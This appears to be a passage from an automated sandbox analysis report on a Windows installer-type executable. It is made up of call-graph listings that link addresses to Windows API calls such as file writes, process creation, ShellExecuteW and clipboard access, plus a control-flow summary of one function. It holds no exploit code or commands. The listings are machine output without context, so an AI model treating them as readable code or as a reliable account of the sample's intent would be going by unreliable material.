WriteFile 3880->3885 3881->3876 3882 403336 ReadFile 3882->3883 3883->3876 3883->3882 3887 40348a GetTickCount 3883->3887 3888 4034af MulDiv wsprintfW 3883->3888 3890 4034f3 WriteFile 3883->3890 3884->3880 3885->3876 3886 4035a1 3885->3886 3886->3876 3886->3880 3887->3883 3889 404f9e 25 API calls 3888->3889 3889->3883 3890->3876 3890->3883 3891->3827 3892->3826 3894 401a75 lstrcatW 3893->3894 3895 40676b lstrcatW 3893->3895 3894->3827 3895->3894 3897 405e79 3896->3897 3898 405e6b SetFileAttributesW 3896->3898 3897->3861 3898->3897 3900 405ce1 3899->3900 3901 405d2f 3900->3901 3902 405cf7 MessageBoxIndirectW 3900->3902 3901->3861 3902->3901 3904 403357 3903->3904 3904->3876 3904->3877 3904->3878 3905->3872 4858 40209f GetDlgItem GetClientRect 4859 40145c 18 API calls 4858->4859 4860 4020cf LoadImageW SendMessageW 4859->4860 4861 4030e3 4860->4861 4862 4020ed DeleteObject 4860->4862 4862->4861 4863 402b9f 4864 401446 18 API calls 4863->4864 4868 402ba7 4864->4868 4865 402c4a 4866 402bdf ReadFile 4866->4868 4875 402c3d 4866->4875 4867 401446 18 API calls 4867->4875 4868->4865 4868->4866 4869 402c06 MultiByteToWideChar 4868->4869 4870 402c3f 4868->4870 4871 402c4f 4868->4871 4868->4875 4869->4868 4869->4871 4876 405f7d wsprintfW 4870->4876 4873 402c6b SetFilePointer 4871->4873 4871->4875 4873->4875 4874 402d17 ReadFile 4874->4875 4875->4865 4875->4867 4875->4874 4876->4865 4877 402b23 GlobalAlloc 4878 402b39 4877->4878 4879 402b4b 4877->4879 4880 401446 18 API calls 4878->4880 4881 40145c 18 API calls 4879->4881 4883 402b41 4880->4883 4882 402b52 WideCharToMultiByte lstrlenA 4881->4882 4882->4883 4884 402b84 WriteFile 4883->4884 4885 402b93 4883->4885 4884->4885 4886 402384 GlobalFree 4884->4886 4886->4885 4888 4040a3 4889 4040b0 lstrcpynW lstrlenW 4888->4889 4890 4040ad 4888->4890 4890->4889 3430 4054a5 3431 4055f9 3430->3431 3432 4054bd 3430->3432 3434 40564a 3431->3434 3435 40560a GetDlgItem GetDlgItem 3431->3435 3432->3431 3433 4054c9 3432->3433 3437 4054d4 SetWindowPos 3433->3437 3438 4054e7 3433->3438 3436 4056a4 3434->3436 3444 40139d 80 API calls 3434->3444 3439 403d6b 19 API calls 3435->3439 3445 4055f4 3436->3445 3500 403ddb 3436->3500 3437->3438 3441 405504 3438->3441 3442 4054ec ShowWindow 3438->3442 3443 405634 SetClassLongW 3439->3443 3446 405526 3441->3446 3447 40550c DestroyWindow 3441->3447 3442->3441 3448 40141d 80 API calls 3443->3448 3451 40567c 3444->3451 3449 40552b SetWindowLongW 3446->3449 3450 40553c 3446->3450 3452 405908 3447->3452 3448->3434 3449->3445 3453 4055e5 3450->3453 3454 405548 GetDlgItem 3450->3454 3451->3436 3455 405680 SendMessageW 3451->3455 3452->3445 3461 405939 ShowWindow 3452->3461 3520 403df6 3453->3520 3458 405578 3454->3458 3459 40555b SendMessageW IsWindowEnabled 3454->3459 3455->3445 3456 40141d 80 API calls 3469 4056b6 3456->3469 3457 40590a DestroyWindow KiUserCallbackDispatcher 3457->3452 3463 405585 3458->3463 3466 4055cc SendMessageW 3458->3466 3467 405598 3458->3467 3475 40557d 3458->3475 3459->3445 3459->3458 3461->3445 3462 406831 18 API calls 3462->3469 3463->3466 3463->3475 3465 403d6b 19 API calls 3465->3469 3466->3453 3470 4055a0 3467->3470 3471 4055b5 3467->3471 3468 4055b3 3468->3453 3469->3445 3469->3456 3469->3457 3469->3462 3469->3465 3491 40584a DestroyWindow 3469->3491 3503 403d6b 3469->3503 3514 40141d 3470->3514 3472 40141d 80 API calls 3471->3472 3474 4055bc 3472->3474 3474->3453 3474->3475 3517 403d44 3475->3517 3477 405731 GetDlgItem 3478 405746 3477->3478 3479 40574f ShowWindow KiUserCallbackDispatcher 3477->3479 3478->3479 3506 403db1 KiUserCallbackDispatcher 3479->3506 3481 405779 EnableWindow 3484 40578d 3481->3484 3482 405792 GetSystemMenu EnableMenuItem SendMessageW 3483 4057c2 SendMessageW 3482->3483 3482->3484 3483->3484 3484->3482 3507 403dc4 SendMessageW 3484->3507 3508 406035 lstrcpynW 3484->3508 3487 4057f0 lstrlenW 3488 406831 18 API calls 3487->3488 3489 405806 SetWindowTextW 3488->3489 3509 40139d 3489->3509 3491->3452 3492 405864 CreateDialogParamW 3491->3492 3492->3452 3493 405897 3492->3493 3494 403d6b 19 API calls 3493->3494 3495 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3494->3495 3496 40139d 80 API calls 3495->3496 3497 4058e8 3496->3497 3497->3445 3498 4058f0 ShowWindow 3497->3498 3499 403ddb SendMessageW 3498->3499 3499->3452 3501 403df3 3500->3501 3502 403de4 SendMessageW 3500->3502 3501->3469 3502->3501 3504 406831 18 API calls 3503->3504 3505 403d76 SetDlgItemTextW 3504->3505 3505->3477 3506->3481 3507->3484 3508->3487 3512 4013a4 3509->3512 3510 401410 3510->3469 3512->3510 3513 4013dd MulDiv SendMessageW 3512->3513 3534 4015a0 3512->3534 3513->3512 3515 40139d 80 API calls 3514->3515 3516 401432 3515->3516 3516->3475 3518 403d51 SendMessageW 3517->3518 3519 403d4b 3517->3519 3518->3468 3519->3518 3521 403e0b GetWindowLongW 3520->3521 3531 403e94 3520->3531 3522 403e1c 3521->3522 3521->3531 3523 403e2b GetSysColor 3522->3523 3524 403e2e 3522->3524 3523->3524 3525 403e34 SetTextColor 3524->3525 3526 403e3e SetBkMode 3524->3526 3525->3526 3527 403e56 GetSysColor 3526->3527 3528 403e5c 3526->3528 3527->3528 3529 403e63 SetBkColor 3528->3529 3530 403e6d 3528->3530 3529->3530 3530->3531 3532 403e80 DeleteObject 3530->3532 3533 403e87 CreateBrushIndirect 3530->3533 3531->3445 3532->3533 3533->3531 3535 4015fa 3534->3535 3614 40160c 3534->3614 3536 401601 3535->3536 3537 401742 3535->3537 3538 401962 3535->3538 3539 4019ca 3535->3539 3540 40176e 3535->3540 3541 401650 3535->3541 3542 4017b1 3535->3542 3543 401672 3535->3543 3544 401693 3535->3544 3545 401616 3535->3545 3546 4016d6 3535->3546 3547 401736 3535->3547 3548 401897 3535->3548 3549 4018db 3535->3549 3550 40163c 3535->3550 3551 4016bd 3535->3551 3535->3614 3560 4062cf 11 API calls 3536->3560 3552 401751 ShowWindow 3537->3552 3553 401758 3537->3553 3557 40145c 18 API calls 3538->3557 3564 40145c 18 API calls 3539->3564 3554 40145c 18 API calls 3540->3554 3578 4062cf 11 API calls 3541->3578 3558 40145c 18 API calls 3542->3558 3555 40145c 18 API calls 3543->3555 3559 401446 18 API calls 3544->3559 3563 40145c 18 API calls 3545->3563 3577 401446 18 API calls 3546->3577 3546->3614 3547->3614 3668 405f7d wsprintfW 3547->3668 3556 40145c 18 API calls 3548->3556 3561 40145c 18 API calls 3549->3561 3565 401647 PostQuitMessage 3550->3565 3550->3614 3562 4062cf 11 API calls 3551->3562 3552->3553 3566 401765 ShowWindow 3553->3566 3553->3614 3567 401775 3554->3567 3568 401678 3555->3568 3569 40189d 3556->3569 3570 401968 GetFullPathNameW 3557->3570 3571 4017b8 3558->3571 3572 40169a 3559->3572 3560->3614 3573 4018e2 3561->3573 3574 4016c7 SetForegroundWindow 3562->3574 3575 40161c 3563->3575 3576 4019d1 SearchPathW 3564->3576 3565->3614 3566->3614 3580 4062cf 11 API calls 3567->3580 3581 4062cf 11 API calls 3568->3581 3659 406301 FindFirstFileW 3569->3659 3583 4019a1 3570->3583 3584 40197f 3570->3584 3585 4062cf 11 API calls 3571->3585 3586 4062cf 11 API calls 3572->3586 3587 40145c 18 API calls 3573->3587 3574->3614 3588 4062cf 11 API calls 3575->3588 3576->3547 3576->3614 3577->3614 3589 401664 3578->3589 3590 401785 SetFileAttributesW 3580->3590 3591 401683 3581->3591 3603 4019b8 GetShortPathNameW 3583->3603 3583->3614 3584->3583 3609 406301 2 API calls 3584->3609 3593 4017c9 3585->3593 3594 4016a7 Sleep 3586->3594 3595 4018eb 3587->3595 3596 401627 3588->3596 3597 40139d 65 API calls 3589->3597 3598 40179a 3590->3598 3590->3614 3607 404f9e 25 API calls 3591->3607 3641 405d85 CharNextW CharNextW 3593->3641 3594->3614 3604 40145c 18 API calls 3595->3604 3605 404f9e 25 API calls 3596->3605 3597->3614 3606 4062cf 11 API calls 3598->3606 3599 4018c2 3610 4062cf 11 API calls 3599->3610 3600 4018a9 3608 4062cf 11 API calls 3600->3608 3603->3614 3612 4018f5 3604->3612 3605->3614 3606->3614 3607->3614 3608->3614 3613 401991 3609->3613 3610->3614 3611 4017d4 3615 401864 3611->3615 3618 405d32 CharNextW 3611->3618 3636 4062cf 11 API calls 3611->3636 3616 4062cf 11 API calls 3612->3616 3613->3583 3667 406035 lstrcpynW 3613->3667 3614->3512 3615->3591 3617 40186e 3615->3617 3619 401902 MoveFileW 3616->3619 3647 404f9e 3617->3647 3622 4017e6 CreateDirectoryW 3618->3622 3623 401912 3619->3623 3624 40191e 3619->3624 3622->3611 3626 4017fe GetLastError 3622->3626 3623->3591 3630 406301 2 API calls 3624->3630 3640 401942 3624->3640 3628 401827 GetFileAttributesW 3626->3628 3629 40180b GetLastError 3626->3629 3628->3611 3633 4062cf 11 API calls 3629->3633 3634 401929 3630->3634 3631 401882 SetCurrentDirectoryW 3631->3614 3632 4062cf 11 API calls 3635 40195c 3632->3635 3633->3611 3634->3640 3662 406c94 3634->3662 3635->3614 3636->3611 3639 404f9e 25 API calls 3639->3640 3640->3632 3642 405da2 3641->3642 3645 405db4 3641->3645 3644 405daf CharNextW 3642->3644 3642->3645 3643 405dd8 3643->3611 3644->3643 3645->3643 3646 405d32 CharNextW 3645->3646 3646->3645 3648 404fb7 3647->3648 3649 401875 3647->3649 3650 404fd5 lstrlenW 3648->3650 3651 406831 18 API calls 3648->3651 3658 406035 lstrcpynW 3649->3658 3652 404fe3 lstrlenW 3650->3652 3653 404ffe 3650->3653 3651->3650 3652->3649 3654 404ff5 lstrcatW 3652->3654 3655 405011 3653->3655 3656 405004 SetWindowTextW 3653->3656 3654->3653 3655->3649 3657 405017 SendMessageW SendMessageW SendMessageW 3655->3657 3656->3655 3657->3649 3658->3631 3660 4018a5 3659->3660 3661 406317 FindClose 3659->3661 3660->3599 3660->3600 3661->3660 3669 406328 GetModuleHandleA 3662->3669 3666 401936 3666->3639 3667->3583 3668->3614 3670 406340 LoadLibraryA 3669->3670 3671 40634b GetProcAddress 3669->3671 3670->3671 3672 406359 3670->3672 3671->3672 3672->3666 3673 406ac5 lstrcpyW 3672->3673 3674 406b13 GetShortPathNameW 3673->3674 3675 406aea 3673->3675 3676 406b2c 3674->3676 3677 406c8e 3674->3677 3699 405e7c GetFileAttributesW CreateFileW 3675->3699 3676->3677 3680 406b34 WideCharToMultiByte 3676->3680 3677->3666 3679 406af3 CloseHandle GetShortPathNameW 3679->3677 3681 406b0b 3679->3681 3680->3677 3682 406b51 WideCharToMultiByte 3680->3682 3681->3674 3681->3677 3682->3677 3683 406b69 wsprintfA 3682->3683 3684 406831 18 API calls 3683->3684 3685 406b95 3684->3685 3700 405e7c GetFileAttributesW CreateFileW 3685->3700 3687 406ba2 3687->3677 3688 406baf GetFileSize GlobalAlloc 3687->3688 3689 406bd0 ReadFile 3688->3689 3690 406c84 CloseHandle 3688->3690 3689->3690 3691 406bea 3689->3691 3690->3677 3691->3690 3701 405de2 lstrlenA 3691->3701 3694 406c03 lstrcpyA 3697 406c25 3694->3697 3695 406c17 3696 405de2 4 API calls 3695->3696 3696->3697 3698 406c5c SetFilePointer WriteFile GlobalFree 3697->3698 3698->3690 3699->3679 3700->3687 3702 405e23 lstrlenA 3701->3702 3703 405e2b 3702->3703 3704 405dfc lstrcmpiA 3702->3704 3703->3694 3703->3695 3704->3703 3705 405e1a CharNextA 3704->3705 3705->3702 4891 402da5 4892 4030e3 4891->4892 4893 402dac 4891->4893 4894 401446 18 API calls 4893->4894 4895 402db8 4894->4895 4896 402dbf SetFilePointer 4895->4896 4896->4892 4897 402dcf 4896->4897 4897->4892 4899 405f7d wsprintfW 4897->4899 4899->4892 4900 4049a8 GetDlgItem GetDlgItem 4901 4049fe 7 API calls 4900->4901 4906 404c16 4900->4906 4902 404aa2 DeleteObject 4901->4902 4903 404a96 SendMessageW 4901->4903 4904 404aad 4902->4904 4903->4902 4907 404ae4 4904->4907 4910 406831 18 API calls 4904->4910 4905 404cfb 4908 404da0 4905->4908 4909 404c09 4905->4909 4914 404d4a SendMessageW 4905->4914 4906->4905 4918 40487a 5 API calls 4906->4918 4931 404c86 4906->4931 4913 403d6b 19 API calls 4907->4913 4911 404db5 4908->4911 4912 404da9 SendMessageW 4908->4912 4915 403df6 8 API calls 4909->4915 4916 404ac6 SendMessageW SendMessageW 4910->4916 4923 404dc7 ImageList_Destroy 4911->4923 4924 404dce 4911->4924 4929 404dde 4911->4929 4912->4911 4919 404af8 4913->4919 4914->4909 4921 404d5f SendMessageW 4914->4921 4922 404f97 4915->4922 4916->4904 4917 404ced SendMessageW 4917->4905 4918->4931 4925 403d6b 19 API calls 4919->4925 4920 404f48 4920->4909 4930 404f5d ShowWindow GetDlgItem ShowWindow 4920->4930 4926 404d72 4921->4926 4923->4924 4927 404dd7 GlobalFree 4924->4927 4924->4929 4933 404b09 4925->4933 4935 404d83 SendMessageW 4926->4935 4927->4929 4928 404bd6 GetWindowLongW SetWindowLongW 4932 404bf0 4928->4932 4929->4920 4934 40141d 80 API calls 4929->4934 4944 404e10 4929->4944 4930->4909 4931->4905 4931->4917 4936 404bf6 ShowWindow 4932->4936 4937 404c0e 4932->4937 4933->4928 4939 404b65 SendMessageW 4933->4939 4940 404bd0 4933->4940 4942 404b93 SendMessageW 4933->4942 4943 404ba7 SendMessageW 4933->4943 4934->4944 4935->4908 4951 403dc4 SendMessageW 4936->4951 4952 403dc4 SendMessageW 4937->4952 4939->4933 4940->4928 4940->4932 4942->4933 4943->4933 4945 404e54 4944->4945 4948 404e3e SendMessageW 4944->4948 4946 404f1f InvalidateRect 4945->4946 4950 404ecd SendMessageW SendMessageW 4945->4950 4946->4920 4947 404f35 4946->4947 4949 4043d9 21 API calls 4947->4949 4948->4945 4949->4920 4950->4945 4951->4909 4952->4906 4953 4030a9 SendMessageW 4954 4030c2 InvalidateRect 4953->4954 4955 4030e3 4953->4955 4954->4955 3906 4038af #17 SetErrorMode OleInitialize 3907 406328 3 API calls 3906->3907 3908 4038f2 SHGetFileInfoW 3907->3908 3980 406035 lstrcpynW 3908->3980 3910 40391d GetCommandLineW 3981 406035 lstrcpynW 3910->3981 3912 40392f GetModuleHandleW 3913 403947 3912->3913 3914 405d32 CharNextW 3913->3914 3915 403956 CharNextW 3914->3915 3926 403968 3915->3926 3916 403a02 3917 403a21 GetTempPathW 3916->3917 3982 4037f8 3917->3982 3919 403a37 3921 403a3b GetWindowsDirectoryW lstrcatW 3919->3921 3922 403a5f DeleteFileW 3919->3922 3920 405d32 CharNextW 3920->3926 3924 4037f8 11 API calls 3921->3924 3990 4035b3 GetTickCount GetModuleFileNameW 3922->3990 3927 403a57 3924->3927 3925 403a73 3928 403af8 3925->3928 3930 405d32 CharNextW 3925->3930 3966 403add 3925->3966 3926->3916 3926->3920 3933 403a04 3926->3933 3927->3922 3927->3928 4075 403885 3928->4075 3934 403a8a 3930->3934 4082 406035 lstrcpynW 3933->4082 3945 403b23 lstrcatW lstrcmpiW 3934->3945 3946 403ab5 3934->3946 3935 403aed 3938 406113 9 API calls 3935->3938 3936 403bfa 3939 403c7d 3936->3939 3941 406328 3 API calls 3936->3941 3937 403b0d 3940 405ccc MessageBoxIndirectW 3937->3940 3938->3928 3942 403b1b ExitProcess 3940->3942 3944 403c09 3941->3944 3948 406328 3 API calls 3944->3948 3945->3928 3947 403b3f CreateDirectoryW SetCurrentDirectoryW 3945->3947 4083 4067aa 3946->4083 3950 403b62 3947->3950 3951 403b57 3947->3951 3952 403c12 3948->3952 4100 406035 lstrcpynW 3950->4100 4099 406035 lstrcpynW 3951->4099 3956 406328 3 API calls 3952->3956 3959 403c1b 3956->3959 3958 403b70 4101 406035 lstrcpynW 3958->4101 3960 403c69 ExitWindowsEx 3959->3960 3965 403c29 GetCurrentProcess 3959->3965 3960->3939 3964 403c76 3960->3964 3961 403ad2 4098 406035 lstrcpynW 3961->4098 3967 40141d 80 API calls 3964->3967 3969 403c39 3965->3969 4018 405958 3966->4018 3967->3939 3968 406831 18 API calls 3970 403b98 DeleteFileW 3968->3970 3969->3960 3971 403ba5 CopyFileW 3970->3971 3977 403b7f 3970->3977 3971->3977 3972 403bee 3973 406c94 42 API calls 3972->3973 3975 403bf5 3973->3975 3974 406c94 42 API calls 3974->3977 3975->3928 3976 406831 18 API calls 3976->3977 3977->3968 3977->3972 3977->3974 3977->3976 3979 403bd9 CloseHandle 3977->3979 4102 405c6b CreateProcessW 3977->4102 3979->3977 3980->3910 3981->3912 3983 406064 5 API calls 3982->3983 3984 403804 3983->3984 3985 40380e 3984->3985 3986 40674e 3 API calls 3984->3986 3985->3919 3987 403816 CreateDirectoryW 3986->3987 3988 405eab 2 API calls 3987->3988 3989 40382a 3988->3989 3989->3919 4105 405e7c GetFileAttributesW CreateFileW 3990->4105 3992 4035f3 4012 403603 3992->4012 4106 406035 lstrcpynW 3992->4106 3994 403619 4107 40677d lstrlenW 3994->4107 3998 40362a GetFileSize 3999 403726 3998->3999 4013 403641 3998->4013 4112 4032d2 3999->4112 4001 40372f 4003 40376b GlobalAlloc 4001->4003 4001->4012 4124 403368 SetFilePointer 4001->4124 4002 403336 ReadFile 4002->4013 4123 403368 SetFilePointer 4003->4123 4006 4037e9 4009 4032d2 6 API calls 4006->4009 4007 403786 4010 40337f 33 API calls 4007->4010 4008 40374c 4011 403336 ReadFile 4008->4011 4009->4012 4016 403792 4010->4016 4015 403757 4011->4015 4012->3925 4013->3999 4013->4002 4013->4006 4013->4012 4014 4032d2 6 API calls 4013->4014 4014->4013 4015->4003 4015->4012 4016->4012 4016->4016 4017 4037c0 SetFilePointer 4016->4017 4017->4012 4019 406328 3 API calls 4018->4019 4020 40596c 4019->4020 4021 405972 4020->4021 4022 405984 4020->4022 4138 405f7d wsprintfW 4021->4138 4023 405eff 3 API calls 4022->4023 4024 4059b5 4023->4024 4026 4059d4 lstrcatW 4024->4026 4028 405eff 3 API calls 4024->4028 4027 405982 4026->4027 4129 403ec1 4027->4129 4028->4026 4031 4067aa 18 API calls 4032 405a06 4031->4032 4033 405a9c 4032->4033 4035 405eff 3 API calls 4032->4035 4034 4067aa 18 API calls 4033->4034 4036 405aa2 4034->4036 4037 405a38 4035->4037 4038 405ab2 4036->4038 4039 406831 18 API calls 4036->4039 4037->4033 4041 405a5b lstrlenW 4037->4041 4044 405d32 CharNextW 4037->4044 4040 405ad2 LoadImageW 4038->4040 4140 403ea0 4038->4140 4039->4038 4042 405b92 4040->4042 4043 405afd RegisterClassW 4040->4043 4045 405a69 lstrcmpiW 4041->4045 4046 405a8f 4041->4046 4050 40141d 80 API calls 4042->4050 4048 405b9c 4043->4048 4049 405b45 SystemParametersInfoW CreateWindowExW 4043->4049 4051 405a56 4044->4051 4045->4046 4052 405a79 GetFileAttributesW 4045->4052 4054 40674e 3 API calls 4046->4054 4048->3935 4049->4042 4055 405b98 4050->4055 4051->4041 4056 405a85 4052->4056 4053 405ac8 4053->4040 4057 405a95 4054->4057 4055->4048 4058 403ec1 19 API calls 4055->4058 4056->4046 4059 40677d 2 API calls 4056->4059 4139 406035 lstrcpynW 4057->4139 4061 405ba9 4058->4061 4059->4046 4062 405bb5 ShowWindow LoadLibraryW 4061->4062 4063 405c38 4061->4063 4064 405bd4 LoadLibraryW 4062->4064 4065 405bdb GetClassInfoW 4062->4065 4066 405073 83 API calls 4063->4066 4064->4065 4067 405c05 DialogBoxParamW 4065->4067 4068 405bef GetClassInfoW RegisterClassW 4065->4068 4069 405c3e 4066->4069 4072 40141d 80 API calls 4067->4072 4068->4067 4070 405c42 4069->4070 4071 405c5a 4069->4071 4070->4048 4074 40141d 80 API calls 4070->4074 4073 40141d 80 API calls 4071->4073 4072->4048 4073->4048 4074->4048 4076 40389d 4075->4076 4077 40388f CloseHandle 4075->4077 4147 403caf 4076->4147 4077->4076 4082->3917 4200 406035 lstrcpynW 4083->4200 4085 4067bb 4086 405d85 4 API calls 4085->4086 4087 4067c1 4086->4087 4088 406064 5 API calls 4087->4088 4095 403ac3 4087->4095 4091 4067d1 4088->4091 4089 406809 lstrlenW 4090 406810 4089->4090 4089->4091 4093 40674e 3 API calls 4090->4093 4091->4089 4092 406301 2 API calls 4091->4092 4091->4095 4096 40677d 2 API calls 4091->4096 4092->4091 4094 406816 GetFileAttributesW 4093->4094 4094->4095 4095->3928 4097 406035 lstrcpynW 4095->4097 4096->4089 4097->3961 4098->3966 4099->3950 4100->3958 4101->3977 4103 405ca6 4102->4103 4104 405c9a CloseHandle 4102->4104 4103->3977 4104->4103 4105->3992 4106->3994 4108 40678c 4107->4108 4109 406792 CharPrevW 4108->4109 4110 40361f 4108->4110 4109->4108 4109->4110 4111 406035 lstrcpynW 4110->4111 4111->3998 4113 4032f3 4112->4113 4114 4032db 4112->4114 4117 403303 GetTickCount 4113->4117 4118 4032fb 4113->4118 4115 4032e4 DestroyWindow 4114->4115 4116 4032eb 4114->4116 4115->4116 4116->4001 4120 403311 CreateDialogParamW ShowWindow 4117->4120 4121 403334 4117->4121 4125 40635e 4118->4125 4120->4121 4121->4001 4123->4007 4124->4008 4126 40637b PeekMessageW 4125->4126 4127 406371 DispatchMessageW 4126->4127 4128 403301 4126->4128 4127->4126 4128->4001 4130 403ed5 4129->4130 4145 405f7d wsprintfW 4130->4145 4132 403f49 4133 406831 18 API calls 4132->4133 4134 403f55 SetWindowTextW 4133->4134 4135 403f70 4134->4135 4136 403f8b 4135->4136 4137 406831 18 API calls 4135->4137 4136->4031 4137->4135 4138->4027 4139->4033 4146 406035 lstrcpynW 4140->4146 4142 403eb4 4143 40674e 3 API calls 4142->4143 4144 403eba lstrcatW 4143->4144 4144->4053 4145->4132 4146->4142 4148 403cbd 4147->4148 4149 4038a2 4148->4149 4150 403cc2 FreeLibrary GlobalFree 4148->4150 4151 406cc7 4149->4151 4150->4149 4150->4150 4152 4067aa 18 API calls 4151->4152 4153 406cda 4152->4153 4154 406ce3 DeleteFileW 4153->4154 4155 406cfa 4153->4155 4194 4038ae CoUninitialize 4154->4194 4156 406e77 4155->4156 4198 406035 lstrcpynW 4155->4198 4162 406301 2 API calls 4156->4162 4182 406e84 4156->4182 4156->4194 4158 406d25 4159 406d39 4158->4159 4160 406d2f lstrcatW 4158->4160 4163 40677d 2 API calls 4159->4163 4161 406d3f 4160->4161 4165 406d4f lstrcatW 4161->4165 4167 406d57 lstrlenW FindFirstFileW 4161->4167 4164 406e90 4162->4164 4163->4161 4168 40674e 3 API calls 4164->4168 4164->4194 4165->4167 4166 4062cf 11 API calls 4166->4194 4171 406e67 4167->4171 4195 406d7e 4167->4195 4169 406e9a 4168->4169 4172 4062cf 11 API calls 4169->4172 4170 405d32 CharNextW 4170->4195 4171->4156 4173 406ea5 4172->4173 4174 405e5c 2 API calls 4173->4174 4175 406ead RemoveDirectoryW 4174->4175 4179 406ef0 4175->4179 4180 406eb9 4175->4180 4176 406e44 FindNextFileW 4178 406e5c FindClose 4176->4178 4176->4195 4178->4171 4181 404f9e 25 API calls 4179->4181 4180->4182 4183 406ebf 4180->4183 4181->4194 4182->4166 4185 4062cf 11 API calls 4183->4185 4184 4062cf 11 API calls 4184->4195 4186 406ec9 4185->4186 4189 404f9e 25 API calls 4186->4189 4187 406cc7 72 API calls 4187->4195 4188 405e5c 2 API calls 4190 406dfa DeleteFileW 4188->4190 4191 406ed3 4189->4191 4190->4195 4192 406c94 42 API calls 4191->4192 4192->4194 4193 404f9e 25 API calls 4193->4176 4194->3936 4194->3937 4195->4170 4195->4176 4195->4184 4195->4187 4195->4188 4195->4193 4196 404f9e 25 API calls 4195->4196 4197 406c94 42 API calls 4195->4197 4199 406035 lstrcpynW 4195->4199 4196->4195 4197->4195 4198->4158 4199->4195 4200->4085 4956 401cb2 4957 40145c 18 API calls 4956->4957 4958 401c54 4957->4958 4959 4062cf 11 API calls 4958->4959 4960 401c64 4958->4960 4961 401c59 4959->4961 4962 406cc7 81 API calls 4961->4962 4962->4960 3706 4021b5 3707 40145c 18 API calls 3706->3707 3708 4021bb 3707->3708 3709 40145c 18 API calls 3708->3709 3710 4021c4 3709->3710 3711 40145c 18 API calls 3710->3711 3712 4021cd 3711->3712 3713 40145c 18 API calls 3712->3713 3714 4021d6 3713->3714 3715 404f9e 25 API calls 3714->3715 3716 4021e2 ShellExecuteW 3715->3716 3717 40221b 3716->3717 3718 40220d 3716->3718 3719 4062cf 11 API calls 3717->3719 3720 4062cf 11 API calls 3718->3720 3721 402230 3719->3721 3720->3717 4963 402238 4964 40145c 18 API calls 4963->4964 4965 40223e 4964->4965 4966 4062cf 11 API calls 4965->4966 4967 40224b 4966->4967 4968 404f9e 25 API calls 4967->4968 4969 402255 4968->4969 4970 405c6b 2 API calls 4969->4970 4971 40225b 4970->4971 4972 4062cf 11 API calls 4971->4972 4980 4022ac CloseHandle 4971->4980 4977 40226d 4972->4977 4974 4030e3 4975 402283 WaitForSingleObject 4976 402291 GetExitCodeProcess 4975->4976 4975->4977 4979 4022a3 4976->4979 4976->4980 4977->4975 4978 40635e 2 API calls 4977->4978 4977->4980 4978->4975 4982 405f7d wsprintfW 4979->4982 4980->4974 4982->4980 3782 401eb9 3783 401f24 3782->3783 3786 401ec6 3782->3786 3784 401f53 GlobalAlloc 3783->3784 3788 401f28 3783->3788 3790 406831 18 API calls 3784->3790 3785 401ed5 3789 4062cf 11 API calls 3785->3789 3786->3785 3792 401ef7 3786->3792 3787 401f36 3806 406035 lstrcpynW 3787->3806 3788->3787 3791 4062cf 11 API calls 3788->3791 3801 401ee2 3789->3801 3794 401f46 3790->3794 3791->3787 3804 406035 lstrcpynW 3792->3804 3796 402708 3794->3796 3797 402387 GlobalFree 3794->3797 3797->3796 3798 401f06 3805 406035 lstrcpynW 3798->3805 3799 406831 18 API calls 3799->3801 3801->3796 3801->3799 3802 401f15 3807 406035 lstrcpynW 3802->3807 3804->3798 3805->3802 3806->3794 3807->3796 4983 404039 4984 404096 4983->4984 4985 404046 lstrcpynA lstrlenA 4983->4985 4985->4984 4986 404077 4985->4986 4986->4984 4987 404083 GlobalFree 4986->4987 4987->4984

                                                                                                      Executed Functions

                                                                                                      Function 004050F9 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 295windowclipboardmemoryCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 0 4050f9-405114 1 4052c1-4052c8 0->1 2 40511a-405201 GetDlgItem * 3 call 403dc4 call 4044a2 call 406831 call 4062cf GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052f2-4052ff 1->3 4 4052ca-4052ec GetDlgItem CreateThread CloseHandle 1->4 35 405203-40521d SendMessageW * 2 2->35 36 40521f-405222 2->36 6 405320-405327 3->6 7 405301-40530a 3->7 4->3 11 405329-40532f 6->11 12 40537e-405382 6->12 9 405342-40534b call 403df6 7->9 10 40530c-40531b ShowWindow * 2 call 403dc4 7->10 22 405350-405354 9->22 10->6 16 405331-40533d call 403d44 11->16 17 405357-405367 ShowWindow 11->17 12->9 14 405384-405387 12->14 14->9 20 405389-40539c SendMessageW 14->20 16->9 23 405377-405379 call 403d44 17->23 24 405369-405372 call 404f9e 17->24 29 4053a2-4053c3 CreatePopupMenu call 406831 AppendMenuW 20->29 30 4052ba-4052bc 20->30 23->12 24->23 37 4053c5-4053d6 GetWindowRect 29->37 38 4053d8-4053de 29->38 30->22 35->36 39 405232-405249 call 403d6b 36->39 40 405224-405230 SendMessageW 36->40 41 4053df-4053f7 TrackPopupMenu 37->41 38->41 46 40524b-40525f ShowWindow 39->46 47 40527f-4052a0 GetDlgItem SendMessageW 39->47 40->39 41->30 43 4053fd-405414 41->43 45 405419-405434 SendMessageW 43->45 45->45 48 405436-405459 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 49 405261-40526c ShowWindow 46->49 50 40526e 46->50 47->30 51 4052a2-4052b8 SendMessageW * 2 47->51 52 40545b-405484 SendMessageW 48->52 54 405274-40527a call 403dc4 49->54 50->54 51->30 52->52 53 405486-4054a0 GlobalUnlock SetClipboardData CloseClipboard 52->53 53->30 54->47
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                                                                      • GetClientRect.USER32(?,?), ref: 004051C2
                                                                                                      • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                                                                      • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                                                                      • ShowWindow.USER32(?,00000008), ref: 00405266
                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
